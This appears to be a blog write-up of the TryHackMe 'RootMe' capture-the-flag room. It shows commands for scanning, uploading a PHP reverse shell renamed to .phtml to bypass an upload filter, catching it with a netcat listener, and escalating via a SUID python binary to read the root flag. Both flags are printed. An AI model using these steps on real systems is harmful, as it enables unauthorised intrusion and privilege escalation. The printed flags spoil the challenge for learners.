RootMe – a tryhackme.com writeup

RootMe

This is a very basic CTF room from tryhackme.com – you basically guided through step by step. Let’s have a look.

sudo nmap -sV 10.10.189.114

So there we have our first three answers: 2 Ports, Apache 2.4.29 and on 22 a ssh server is running.

Time for gobuster

gobuster dir -e -q -t100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url 10.10.189.114 -x php,txt,html,js,pdf

So panel is our next answer.

When we visit the panel URL we see a simple upload form and our task is to upload a webshell. In kali there is one at

/usr/share/webshells/php/php-reverse-shell.php

But you can easily find them on the web as well.

First of all we copy it to our working directory, shorten the name and change the extension.

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php rs.phtml

The name shortening is just for convenience – changing the extension has a practical reason: .php files are most often blocked by upload forms. .phtml files are more likely to go through

We no have to change the rs.phtml a bit.

vi rs.phtml

We have to change the $ip variable to that of our local machine so the reverse shell can connect back to us.

We then can upload the rs.phtml.

That went through – good.Now we need to setup netcat on our end to listen to the reverse shell.

The  reverse shell is looking for us on port 1234 so our netcat command is

nc -lnvp 1234

From our gobuster scan we know that there is an upload directory – we assume our rs.phtml file is there now – so lets try.

We open

http://10.10.189.114/uploads/rs.phtml

with the browser and immediatly see this on our netcat session:

So let’s look for the user flag. Or be lazy and let linux find it for us:

find / -name user.txt 2>/dev/null

It is und /var/www/user.txt and reads

THM{y0u_g0t_a_sh3ll}

So thats our first answer.

Next we are supposed to look for files with the SUID flag. So let’s do that.

find / -perm -4000 -user root 2>/dev/null

The interesting result is 

/usr/bin/python

Because it means we can execute python with root privileges.

We assume the root flag in /root/root.txt – so lets just try to read it out using python.

python -c 'print(open("/root/root.txt").read())'

And we are lucky. It prints out the root flag wich is

THM{pr1v1l3g3_3sc4l4t10n}

Leave a Reply

Your email address will not be published.